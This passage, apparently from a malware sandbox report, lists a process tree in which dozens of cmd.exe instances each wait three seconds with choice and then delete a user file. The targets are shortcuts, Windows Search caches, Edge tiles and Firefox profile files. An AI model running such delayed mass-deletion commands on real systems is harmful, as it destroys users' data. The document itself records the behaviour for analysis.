C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"3⤵PID:7400
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3308
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk"3⤵PID:7412
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14928
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk"3⤵PID:7632
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14804
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Are.docx.lnk"3⤵PID:7912
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14940
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Files.docx.lnk"3⤵PID:8076
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14788
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\ms-gamingoverlay--kglcheck-.lnk"3⤵PID:8096
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15356
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Opened.docx.lnk"3⤵PID:8116
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14820
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Recently.docx.lnk"3⤵PID:8140
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14796
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\The Internet.lnk"3⤵PID:8152
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15284
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\These.docx.lnk"3⤵PID:8180
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15128
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk"3⤵PID:7016
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15176
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk"3⤵PID:6972
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15220
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\blurrect.png"3⤵PID:6936
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14668
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk"3⤵PID:7204
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14692
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk"3⤵PID:7324
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15040
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk"3⤵PID:7184
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk"3⤵PID:7268
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15120
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk"3⤵PID:7380
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15192
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk"3⤵PID:8436
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14916
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk"3⤵PID:8464
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15168
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk"3⤵PID:8508
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15320
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk"3⤵PID:8688
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14908
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk"3⤵PID:8704
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4916
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk"3⤵PID:8724
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2084
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk"3⤵PID:8788
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4032
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk"3⤵PID:8812
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15248
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk"3⤵PID:8824
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1260
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk"3⤵PID:8976
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2212
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk"3⤵PID:8988
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3124
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk"3⤵PID:9008
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4836
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk"3⤵PID:9024
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk"3⤵PID:9040
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1440
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586085280888932.txt"3⤵PID:9056
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15208
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586085966055628.txt"3⤵PID:9072
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15200
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086206312543.txt"3⤵PID:9092
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15408
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086279146572.txt"3⤵PID:9112
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4988
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086489672153.txt"3⤵PID:9132
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4336
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086519342437.txt"3⤵PID:9152
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15492
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086580751035.txt"3⤵PID:9236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15420
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086778327262.txt"3⤵PID:9312
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15512
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086798249226.txt"3⤵PID:9328
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3820
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586088054759135.txt"3⤵PID:9492
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5004
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586088680666336.txt"3⤵PID:9536
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3616
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586092157337803.txt"3⤵PID:9548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4008
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586092457469885.txt"3⤵PID:9560
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:396
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586092759102724.txt"3⤵PID:9580
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1064
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586093118861419.txt"3⤵PID:9600
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4816
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586093532550880.txt"3⤵PID:9624
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2816
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586093718685787.txt"3⤵PID:9848
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586095008010161.txt"3⤵PID:9864
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1216
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586095322670126.txt"3⤵PID:9876
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1176
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586095622852471.txt"3⤵PID:9892
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15536
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586096481601425.txt"3⤵PID:9904
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4500
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586133455468809.txt"3⤵PID:9928
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15544
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt"3⤵PID:9956
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15520
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk"3⤵PID:9976
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15528
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"3⤵PID:9988
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15504
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nzxw1g49.default-release\AlternateServices.txt"3⤵PID:10008
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15432
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nzxw1g49.default-release\pkcs11.txt"3⤵PID:10020
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15368
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nzxw1g49.default-release\SiteSecurityServiceState.txt"3⤵PID:10040
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15568
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6DEZ09S4\known_providers_download_v1[1].xml"3⤵PID:10068
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16296
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GO42234Z\update100[1].xml"3⤵PID:9740
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15440
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png"3⤵PID:10376
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3968
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png"3⤵PID:10388
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4676
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png"3⤵PID:10408
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15340
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png"3⤵PID:10420
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15600
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png"3⤵PID:10440
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15456
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png"3⤵PID:10456
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15232
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png"3⤵PID:10472
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15312
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png"3⤵PID:10488
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15560
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{33cca336-bc0b-4bf5-81f7-72f383d59d45}\0.0.filtertrie.intermediate.txt"3⤵PID:10512
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15772
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{33cca336-bc0b-4bf5-81f7-72f383d59d45}\0.1.filtertrie.intermediate.txt"3⤵PID:10524
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15784
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{33cca336-bc0b-4bf5-81f7-72f383d59d45}\0.2.filtertrie.intermediate.txt"3⤵PID:10536
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15980
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5b7d796b-42ab-4f4e-88b0-1a31bb688b07}\0.0.filtertrie.intermediate.txt"3⤵PID:10560
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15612
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5b7d796b-42ab-4f4e-88b0-1a31bb688b07}\0.1.filtertrie.intermediate.txt"3⤵PID:10576
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2392
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5b7d796b-42ab-4f4e-88b0-1a31bb688b07}\0.2.filtertrie.intermediate.txt"3⤵PID:10596
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15676
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77c099d1-8a51-41d6-8415-0fcad7068143}\0.0.filtertrie.intermediate.txt"3⤵PID:10612
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15988
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77c099d1-8a51-41d6-8415-0fcad7068143}\0.1.filtertrie.intermediate.txt"3⤵PID:10628
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:532
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77c099d1-8a51-41d6-8415-0fcad7068143}\0.2.filtertrie.intermediate.txt"3⤵PID:10640
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16340
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7c78f2af-cc60-4ebe-917f-65cfd08ceb41}\appsconversions.txt"3⤵PID:10716
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16256
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7c78f2af-cc60-4ebe-917f-65cfd08ceb41}\appsglobals.txt"3⤵PID:10900
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15968
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7c78f2af-cc60-4ebe-917f-65cfd08ceb41}\appssynonyms.txt"3⤵PID:10916
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15448
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7c78f2af-cc60-4ebe-917f-65cfd08ceb41}\settingsconversions.txt"3⤵PID:10940
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4664
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7c78f2af-cc60-4ebe-917f-65cfd08ceb41}\settingsglobals.txt"3⤵PID:10968
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16248
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7c78f2af-cc60-4ebe-917f-65cfd08ceb41}\settingssynonyms.txt"3⤵PID:10980
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2244
-
-
-
